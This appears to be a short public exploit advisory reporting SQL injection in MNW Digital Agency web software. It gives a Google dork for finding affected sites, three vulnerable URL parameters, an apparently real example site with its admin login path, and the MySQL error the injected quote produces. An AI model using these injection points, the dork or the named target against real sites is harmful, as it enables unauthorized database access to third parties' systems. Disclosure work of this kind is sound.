#################################################################################################
# Exploit Title : MNW Digital Agency Mnw.Pt Hosting Portugal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 14/09/2018
# Vendor Homepage : mnw.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''MNW Digital Agency''
# Admin Panel Path => targetdomainnameSYSTEM.targetdomainname.pt
# Exploit :
/formacao.php?codigo=[SQL Injection]
/noticia.php?codigo=[SQL Injection]
/resultado.php?idmeet=[SQL Injection]
#################################################################################################
# Example Site => fpnatacao.pt/formacao.php?codigo=36%27 => [ Proof of Concept ] => archive.is/Jx9yy
# Example Site Admin Login Panel Path => fpnsystem.fpnatacao.pt
# SQL Database Error =>
Message: MySQL Query fail: select * from base_noticias_files where activo=1 and eliminado=0 and referencia='36''
order by ordem, legenda, file
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your
MariaDB server version for the right syntax to use near ''36'' order by ordem, legenda, file' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################